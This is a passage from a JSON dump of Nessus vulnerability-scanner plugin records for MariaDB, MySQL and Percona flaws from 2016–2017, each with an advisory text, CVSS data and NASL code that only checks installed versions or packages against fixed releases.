script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6663\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.52-MariaDB', min:'5.5', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T04:03:54", "description": "The version of MariaDB running on the remote host is 10.1.x prior to\n10.1.18. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.", "edition": 30, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_1_18.NASL", "href": "https://www.tenable.com/plugins/nessus/95632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95632);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-3492\",\n \"CVE-2016-5616\",\n \"CVE-2016-5624\",\n \"CVE-2016-5626\",\n \"CVE-2016-5629\",\n \"CVE-2016-6663\",\n \"CVE-2016-8283\"\n );\n script_bugtraq_id(\n 92911,\n 93614,\n 93635,\n 93638,\n 93650,\n 93668,\n 93737\n );\n\n script_name(english:\"MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.1.x prior to\n10.1.18. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Optimizer subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-3492)\n\n - An unspecified flaw exists in the MyISAM subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-5616)\n\n - An unspecified flaw exists in the DML subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5624)\n\n - An unspecified flaw exists in the GIS subcomponent that\n allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-5626)\n\n - An unspecified flaw exists in the Federated subcomponent\n that allows an authenticated remote attacker to cause a\n denial of service condition. (CVE-2016-5629)\n\n - A security bypass vulnerability exists that allows an\n authenticated, remote attacker to bypass file access\n restrictions and create the /var/lib/mysql/my.cnf file\n with arbitrary contents without the FILE privilege\n requirement. (CVE-2016-6663)\n\n - An unspecified flaw exists in the Types subcomponent\n that allows an authenticated, remote attacker to cause a\n denial of service condition. (CVE-2016-8283)\n\n - A flaw exists in the Item_field::fix_after_pullout()\n function within file sql/item.cc when handling a\n prepared statement with conversion to semi-join. An\n authenticated, remote attacker can exploit this to cause\n a denial of service condition.\n\n - An assertion flaw exists in the mysql_admin_table()\n function within file sql/sql_admin.cc when handling\n the re-execution of certain ANALYZE TABLE prepared\n statements. An authenticated, remote attacker can\n exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-10118-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/library/mariadb-10118-changelog/\");\n # https://mariadb.com/resources/blog/update-on-security-vulnerabilities-cve-2016-6663-and-cve-2016-6664-related-to-mariadb-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fefde198\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.1.18 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-6663\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.1.18-MariaDB', min:'10.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:48:07", "description": "The MySQL project reports :\n\n- CVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\nsub component.\n\n- CVE-2016-5616, CVE-2016-6663: Race condition allows local users with\ncertain permissions to gain privileges by leveraging use of\nmy_copystat by REPAIR TABLE to repair a MyISAM table.\n\n- CVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\nlogging, allows local users with access to the mysql account to gain\nroot privileges via a symlink attack on error logs and possibly other\nfiles.\n\n- CVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\ncomponent.\n\n- CVE-2016-5626: Remote security vulnerability in 'Server: GIS' sub\ncomponent.\n\n- CVE-2016-5629: Remote security vulnerability in 'Server: Federated'\nsub component.\n\n- CVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\ncomponent.", "edition": 28, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-16T00:00:00", "title": "FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5624", "CVE-2016-3492", "CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-5626", "CVE-2016-8283", "CVE-2016-5629"], "modified": "2017-01-16T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql56-server", "p-cpe:/a:freebsd:freebsd:mariadb100-server", "p-cpe:/a:freebsd:freebsd:mariadb100-client", "p-cpe:/a:freebsd:freebsd:mariadb55-client", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mysql56-client", "p-cpe:/a:freebsd:freebsd:mysql55-client", "p-cpe:/a:freebsd:freebsd:mariadb101-client", "p-cpe:/a:freebsd:freebsd:percona55-server", "p-cpe:/a:freebsd:freebsd:mysql55-server", "p-cpe:/a:freebsd:freebsd:mysql57-client", "p-cpe:/a:freebsd:freebsd:percona55-client", "p-cpe:/a:freebsd:freebsd:percona56-client", "p-cpe:/a:freebsd:freebsd:mariadb101-server", "p-cpe:/a:freebsd:freebsd:percona56-server", "p-cpe:/a:freebsd:freebsd:mysql57-server", "p-cpe:/a:freebsd:freebsd:mariadb55-server"], "id": "FREEBSD_PKG_22373C43D72811E6A9A5B499BAEBFEAF.NASL", "href": "https://www.tenable.com/plugins/nessus/96510", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96510);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3492\", \"CVE-2016-5616\", \"CVE-2016-5617\", \"CVE-2016-5624\", \"CVE-2016-5626\", \"CVE-2016-5629\", \"CVE-2016-6663\", \"CVE-2016-6664\", \"CVE-2016-8283\");\n\n script_name(english:\"FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MySQL project reports :\n\n- CVE-2016-3492: Remote security vulnerability in 'Server: Optimizer'\nsub component.\n\n- CVE-2016-5616, CVE-2016-6663: Race condition allows local users with\ncertain permissions to gain privileges by leveraging use of\nmy_copystat by REPAIR TABLE to repair a MyISAM table.\n\n- CVE-2016-5617, CVE-2016-6664: mysqld_safe, when using file-based\nlogging, allows local users with access to the mysql account to gain\nroot privileges via a symlink attack on error logs and possibly other\nfiles.\n\n- CVE-2016-5624: Remote security vulnerability in 'Server: DML' sub\ncomponent.\n\n- CVE-2016-5626: Remote security vulnerability in 'Server: GIS' sub\ncomponent.\n\n- CVE-2016-5629: Remote security vulnerability in 'Server: Federated'\nsub component.\n\n- CVE-2016-8283: Remote security vulnerability in 'Server: Types' sub\ncomponent.\"\n );\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ad1fd2e\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10028-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5552-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5552-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10118-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10118-release-notes/\"\n );\n # https://vuxml.freebsd.org/freebsd/22373c43-d728-11e6-a9a5-b499baebfeaf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cc418265\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb101-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb101-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql57-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql57-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-client<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-server<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-client<10.0.28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-server<10.0.28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb101-client<10.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb101-server<10.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-client<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-server<5.5.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-client<5.6.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-server<5.6.33\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql57-client<5.7.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql57-server<5.7.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-client<5.5.51.38.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-server<5.5.51.38.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-client<5.6.32.78.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-server<5.6.32.78.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:58", "description": "New mariadb packages are available for Slackware 14.1, 14.2, and\n-current to fix security issues.", "edition": 23, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-19T00:00:00", "title": "Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-01-19T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:mariadb"], "id": "SLACKWARE_SSA_2017-018-01.NASL", "href": "https://www.tenable.com/plugins/nessus/96612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-018-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96612);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-6664\", \"CVE-2017-3238\", \"CVE-2017-3243\", \"CVE-2017-3244\", \"CVE-2017-3257\", \"CVE-2017-3258\", \"CVE-2017-3265\", \"CVE-2017-3291\", \"CVE-2017-3312\", \"CVE-2017-3317\", \"CVE-2017-3318\");\n script_xref(name:\"SSA\", value:\"2017-018-01\");\n\n script_name(english:\"Slackware 14.1 / 14.2 / current : mariadb (SSA:2017-018-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mariadb packages are available for Slackware 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.435634\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48ee8594\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"mariadb\", pkgver:\"5.5.54\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"5.5.54\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mariadb\", pkgver:\"10.0.29\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:11", "description": "This mariadb version update to 10.0.29 fixes the following issues :\n\n - CVE-2017-3318: unspecified vulnerability affecting Error\n Handling (bsc#1020896)\n\n - CVE-2017-3317: unspecified vulnerability affecting\n Logging (bsc#1020894)\n\n - CVE-2017-3312: insecure error log file handling in\n mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873)\n\n - CVE-2017-3291: unrestricted mysqld_safe's ledir\n (bsc#1020884)\n\n - CVE-2017-3265: unsafe chmod/chown use in init script\n (bsc#1020885)\n\n - CVE-2017-3258: unspecified vulnerability in the DDL\n component (bsc#1020875)\n\n - CVE-2017-3257: unspecified vulnerability affecting\n InnoDB (bsc#1020878)\n\n - CVE-2017-3244: unspecified vulnerability affecing the\n DML component (bsc#1020877)\n\n - CVE-2017-3243: unspecified vulnerability affecting the\n Charsets component (bsc#1020891)\n\n - CVE-2017-3238: unspecified vulnerability affecting the\n Optimizer component (bsc#1020882)\n\n - CVE-2016-6664: Root Privilege Escalation (bsc#1008253)\n\n - Applications using the client library for MySQL\n (libmysqlclient.so) had a use-after-free issue that\n could cause the applications to crash (bsc#1022428)\n\n - notable changes :\n\n - XtraDB updated to 5.6.34-79.1\n\n - TokuDB updated to 5.6.34-79.1\n\n - Innodb updated to 5.6.35\n\n - Performance Schema updated to 5.6.35\n\nRelease notes and changelog :\n\n - https://kb.askmonty.org/en/mariadb-10029-release-notes\n\n - https://kb.askmonty.org/en/mariadb-10029-changelog\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 20, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-02-21T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2017-257)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3238", "CVE-2017-3244", "CVE-2017-3312", "CVE-2016-6664", "CVE-2017-3265", "CVE-2017-3291", "CVE-2017-3317", "CVE-2017-3243", "CVE-2017-3318", "CVE-2017-3257", "CVE-2017-3258"], "modified": "2017-02-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", 